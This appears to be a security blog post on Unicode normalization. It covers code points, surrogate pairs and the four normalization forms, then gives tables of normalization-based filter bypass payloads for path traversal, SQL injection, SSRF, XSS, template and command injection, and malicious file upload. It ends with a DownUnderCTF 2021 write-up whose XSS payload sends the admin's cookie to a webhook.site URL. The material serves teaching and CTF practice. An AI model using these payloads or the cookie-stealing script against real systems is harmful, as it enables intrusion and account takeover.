What is Unicode?

Unicode, formally the Unicode Standard, is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.


Unicode assigns every character a unique code point. For example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Code points range from U+0000 to U+10FFFF, which gives 1,114,112 possible values. Unicode divides this range into 17 “planes” of 65,536 code points each. The best known is the BMP (Basic Multilingual Plane), which runs from U+0000 to U+FFFF and is plane 0; the other 16 are the supplementary planes, informally called “astral planes”.

Characters in the “astral” planes do not fit in a single 16-bit code unit, so UTF-16 represents each of them as a “surrogate pair” of two code units.
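
To make the surrogate pair idea concrete, here is a minimal Python sketch of the arithmetic UTF-16 uses. The function name `to_surrogate_pair` is made up for this illustration, and U+1F600 is just a convenient astral code point to test with.

```python
def to_surrogate_pair(code_point: int) -> tuple[int, int]:
    """Split a supplementary-plane code point into UTF-16 high and low surrogates."""
    if not 0x10000 <= code_point <= 0x10FFFF:
        raise ValueError("only code points above the BMP need a surrogate pair")
    offset = code_point - 0x10000        # leaves a 20-bit value
    high = 0xD800 + (offset >> 10)       # top 10 bits go into the high surrogate
    low = 0xDC00 + (offset & 0x3FF)      # bottom 10 bits go into the low surrogate
    return high, low


high, low = to_surrogate_pair(0x1F600)   # U+1F600 GRINNING FACE
print(f"U+{high:04X} U+{low:04X}")       # U+D83D U+DE00

# Cross-check against Python's own UTF-16 encoder (big-endian, no BOM).
expected = "\U0001F600".encode("utf-16-be")
assert expected == high.to_bytes(2, "big") + low.to_bytes(2, "big")
```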

Unicode equivalence

Unicode equivalence is the specification by the Unicode standard that some sequences of code points represent essentially the same character. Unicode normalization is the process that applies it: after normalization, two equivalent strings that used different binary representations for their characters have the same binary value.

Canonical Equivalence

Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.

Compatibility Equivalence

Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.
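
The difference between the two kinds of equivalence can be observed with Python's standard `unicodedata` module. This is only an illustrative sketch; the sample characters (é and the ﬁ ligature) and the helper `same_after` are choices made for this example.

```python
import unicodedata

# Canonical equivalence: the same character encoded in two ways.
composed = "\u00e9"        # é as one code point (LATIN SMALL LETTER E WITH ACUTE)
decomposed = "e\u0301"     # e followed by COMBINING ACUTE ACCENT

# Compatibility equivalence: same abstract character, different appearance.
ligature = "\ufb01"        # ﬁ, LATIN SMALL LIGATURE FI


def same_after(form: str, a: str, b: str) -> bool:
    """Compare two strings after applying the given normalization form."""
    return unicodedata.normalize(form, a) == unicodedata.normalize(form, b)


print(composed == decomposed)                    # False: different code points
print(same_after("NFC", composed, decomposed))   # True: canonically equivalent
print(same_after("NFC", ligature, "fi"))         # False: NFC ignores compatibility mappings
print(same_after("NFKC", ligature, "fi"))        # True: only compatibility-equivalent
```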

Normalization algorithms

The Unicode standard defines four normalization forms: NFC, NFD, NFKC and NFKD. Each one applies either canonical or compatibility mappings and then leaves the result either composed or decomposed. You can read more about them at unicode.org.

  • NFC: Normalization Form Canonical Composition
  • NFD: Normalization Form Canonical Decomposition
  • NFKC: Normalization Form Compatibility Composition
  • NFKD: Normalization Form Compatibility Decomposition

The general idea behind all of these algorithms is to map code point sequences that are considered equivalent to one and the same sequence.
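
As a quick way to see how the four forms differ, the following sketch runs all of them over one sample string and prints the resulting code points. The sample (the ﬁ ligature followed by é) is an arbitrary choice for illustration.

```python
import unicodedata

sample = "\ufb01\u00e9"   # ﬁ (compatibility ligature) followed by é (precomposed)

forms = {
    name: unicodedata.normalize(name, sample)
    for name in ("NFC", "NFD", "NFKC", "NFKD")
}

for name, value in forms.items():
    code_points = " ".join(f"U+{ord(ch):04X}" for ch in value)
    print(f"{name}: {code_points}")

# NFC:  U+FB01 U+00E9
# NFD:  U+FB01 U+0065 U+0301
# NFKC: U+0066 U+0069 U+00E9
# NFKD: U+0066 U+0069 U+0065 U+0301
```

Only the two "K" forms rewrite the ligature into plain ASCII letters, which is why they are the interesting ones from an attacker's point of view.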

What is the impact?

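What can we, as attackers, do with Unicode? If an application validates or filters input first and normalizes it afterwards, characters that pass the filter can turn into the very characters the filter was meant to block. The tables below list such characters for common vulnerability classes.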

Path traversal

Character      Payload               After Normalization
‥ (U+2025)     ‥/‥/‥/etc/passwd      ../../../etc/passwd
︰ (U+FE30)     ︰/︰/︰/etc/passwd      ../../../etc/passwd
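
The path traversal case can be reproduced with a small sketch. It assumes a hypothetical application that rejects ".." and applies NFKC normalization; the function names `handle_vulnerable` and `handle_safer` are invented here and do not come from any real framework.

```python
import unicodedata


def handle_vulnerable(user_input: str) -> str:
    """Hypothetical handler: filters first, normalizes afterwards (wrong order)."""
    if ".." in user_input:
        raise ValueError("path traversal rejected")
    return unicodedata.normalize("NFKC", user_input)


def handle_safer(user_input: str) -> str:
    """Same check, but applied to the normalized value."""
    normalized = unicodedata.normalize("NFKC", user_input)
    if ".." in normalized:
        raise ValueError("path traversal rejected")
    return normalized


payload = "\u2025/\u2025/\u2025/etc/passwd"   # ‥/‥/‥/etc/passwd

print(handle_vulnerable(payload))             # ../../../etc/passwd

try:
    handle_safer(payload)
except ValueError as exc:
    print(f"blocked: {exc}")
```

The same ordering problem applies to every other table in this section: the check must see the string in the form that is finally used.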

SQL Injection

Character      Payload              After Normalization
＇ (U+FF07)     ＇ or ＇1＇=＇1          ' or '1'='1
＂ (U+FF02)     ＂ or ＂1＂=＂1          " or "1"="1
﹣ (U+FE63)     admin'﹣﹣             admin'--

Server-Side Request Forgery - SSRF

Character      Payload            After Normalization
⓪ (U+24EA)     ①②⑦.⓪.⓪.①          127.0.0.1
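
A rough sketch of why this matters for SSRF filters: a blocklist that parses the raw host sees no IP address at all, while the normalized host is the loopback address. The helper `is_loopback_host` is a made-up example, and NFKC is assumed to be the normalization applied later in the request pipeline.

```python
import ipaddress
import unicodedata


def is_loopback_host(host: str) -> bool:
    """Hypothetical blocklist check: True if host parses as a loopback IP."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False   # not a literal IP address as far as the parser can tell


payload = "\u2460\u2461\u2466.\u24ea.\u24ea.\u2460"    # ①②⑦.⓪.⓪.①
normalized = unicodedata.normalize("NFKC", payload)

print(is_loopback_host(payload))      # False: the filter lets it through
print(normalized)                     # 127.0.0.1
print(is_loopback_host(normalized))   # True: what the request would actually hit
```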

Open Redirect

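Character      Payload           After Normalization
。 (U+3002)     lazarv。com        lazarv.com
／ (U+FF0F)     ／／lazarv.com      //lazarv.com

Note that U+3002 has no NFKC decomposition. It is the IDNA hostname mapping (UTS #46), as applied by browsers, that turns it into a period.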

Cross Site Scripting - XSS

Character      Payload                  After Normalization
＜ (U+FF1C)     ＜script src=a/＞          <script src=a/>
＂ (U+FF02)     ＂onclick='prompt(1)'     "onclick='prompt(1)'

Template Injection - SSTI and CSTI

Character      Payload        After Normalization
﹛ (U+FE5B)     ﹛﹛3+3﹜﹜        {{3+3}}
［ (U+FF3B)     ［［5+5］］        [[5+5]]

OS Command Injection

Character      Payload         After Normalization
＆ (U+FF06)     ＆＆whoami        &&whoami
｜ (U+FF5C)     ｜｜ whoami       || whoami

Arbitrary file upload

Character                  Payload         After Normalization
ｐ (U+FF50), ʰ (U+02B0)     shell.ｐʰｐ       shell.php

Chain reaction writeup from DownUnderCTF 2021

Upon visiting the main page, we see an option to register or log in.

Register any account and log in.

After logging in, we can visit our profile from the upper right corner of the page.

On the profile page, we can update our username and “About me” text, and report the current page to the admin.

This might be an opportunity for XSS, but after inserting <script>alert(1)</script> I get redirected to another page.

At this point, we know that some kind of input sanitization or character blacklisting is being performed. After some trial and error, I decided to try replacing the blacklisted characters with Unicode equivalents taken from a Unicode normalization reference table.
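
If no reference table is at hand, candidate replacements can be generated locally. The sketch below brute-forces every code point and keeps those that normalize to a given blacklisted character; `normalizes_to` is a name invented for this example, and NFKC is an assumption about what the target applies.

```python
import unicodedata


def normalizes_to(target: str, form: str = "NFKC") -> list[str]:
    """Return every other single code point that normalizes to `target`."""
    matches = []
    for cp in range(0x110000):
        if 0xD800 <= cp <= 0xDFFF:   # skip surrogates, they are not characters
            continue
        ch = chr(cp)
        if ch != target and unicodedata.normalize(form, ch) == target:
            matches.append(ch)
    return matches


# List the stand-ins for "<" by code point and official name.
for ch in normalizes_to("<"):
    print(f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}")
```

The exact list depends on the Unicode version shipped with the Python interpreter, so it is worth testing each candidate against the target.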

I intercepted the update request in Burp Suite and broke out of the HTML context by injecting ""> test, with the quotes and the angle bracket replaced by their Unicode equivalents:

username=lazar&aboutme=%ef%bc%82%ef%bc%82%ef%b9%a5 test

This means that I can inject a simple cookie stealer that sends me the cookie in base64, which lets me log in as the admin once they review the reported page. I injected the following JavaScript PoC:

%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie)  %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5

Which, after URL decoding and normalization, translates to:

""><script> var i = new Image(); i.src='https://webhook.site/MYID?' + btoa(document.cookie)  </script>

Here I create a new Image object and set its src attribute to a webhook URL I created, appending the user’s cookie, which is read from the document.cookie property and encoded to base64 with the native JavaScript btoa function.

Note that the script keyword is blacklisted, so I had to replace the p with a Unicode equivalent (ᵖ, U+1D56).
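
The transformation of the payload prefix can be checked offline. This sketch assumes the server URL-decodes the parameter as UTF-8 and then applies NFKC; the challenge source is not shown here, so the exact normalization form is a guess that happens to match the observed behavior.

```python
import unicodedata
from urllib.parse import unquote

# Opening part of the PoC exactly as sent in the request body.
encoded = "%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5"

decoded = unquote(encoded)                           # percent-decoding, UTF-8 by default
normalized = unicodedata.normalize("NFKC", decoded)  # assumed server-side step

print([f"U+{ord(ch):04X}" for ch in decoded if ord(ch) > 0x7F])
print("script" in decoded)    # False: the blacklist sees nothing suspicious
print(normalized)             # ""><script>
```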

After pressing the “Report Error” button on the page, my webhook received a request with the base64-encoded value appended.

Decoding the base64 gives the admin-cookie value.

I applied the cookie to my current session by opening the developer tools and executing the following:

document.cookie = "admin-cookie=COOKIE_VALUE"

Now we are able to access the /admin endpoint, which holds the flag.